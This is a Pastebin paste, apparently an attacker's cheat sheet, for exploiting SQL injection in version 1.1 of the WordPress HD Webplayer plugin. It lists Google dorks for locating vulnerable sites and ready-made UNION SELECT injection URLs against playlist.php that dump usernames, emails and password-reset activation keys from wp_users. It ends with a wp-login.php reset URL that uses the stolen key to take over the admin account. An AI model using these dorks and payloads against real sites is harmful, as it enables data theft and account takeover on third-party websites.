API tools faq
paste
View difference between Paste ID: 3FwyQ9Qd and 3QmHrKfJ
SHOW: | | - or go back to the newest paste.
1
===============================================================================================
2
=                     SQL Injection: WordPress HD Webplayer – Version 1.1                     =
3
=                                                                                             =
4
===============================================================================================
5
                                       METODO 1 "Dork's"
6
===============================================================================================
7
#DORK 1
8
inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=
9
10
#DORK 2

11
HD_Webplayer_Commercial_Key logo.jpg topleft 50 http

12
13
===============================================================================================

14
                                       METODO 2  "Dork's"

15
===============================================================================================

16
# Dork 1 (config.php)

17
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

18
19
# Dork 2 (playlist.php)

20
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

21
22
# Dork 3 (General):

23
inurl:"/wp-content/plugins/hd-webplayer/"

24
===============================================================================================

25
                                               METODO 1  

26
===============================================================================================

27
1 : playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11+from+wp_users

28
===============================================================================================

29
2 : /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users

30
===============================================================================================

31
3 : wp-login.php?action=rp&key=KEY&login=admin

32
===============================================================================================

33
                                               METODO 2

34
===============================================================================================

35
1 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

36
===============================================================================================

37
2 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--

38
===============================================================================================

39
3 : wp-login.php?action=rp&key=KEY&login=admin

40
===============================================================================================
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!